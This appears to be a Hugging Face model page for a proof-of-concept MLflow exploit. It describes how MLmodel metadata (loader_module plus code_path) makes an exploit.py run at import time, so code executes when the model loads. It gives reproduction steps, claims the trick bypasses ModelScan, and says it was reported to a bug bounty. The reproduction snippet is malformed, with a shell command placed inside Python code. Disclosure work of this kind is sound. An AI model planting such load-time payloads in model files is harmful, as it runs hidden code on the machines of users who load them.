MLFlow pyfunc RCE PoC

Format: MLFlow

Attack: loader_module + code_path โ†’ importlib.import_module() โ†’ RCE at model load time

How to reproduce:

pip install mlflow
python3 -c "
import mlflow.pyfunc
mlflow.pyfunc.load_model('.')
whoami > /tmp/pwned.txt
"

PoC files:

  • MLmodel โ€” specifies loader_module: exploit and code: code/
  • code/exploit.py โ€” top-level code runs at import time

Bypasses: ModelScan (protectai/modelscan) โ€” no scanner for MLmodel metadata

Submitted to: huntr.com MFV bounty

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support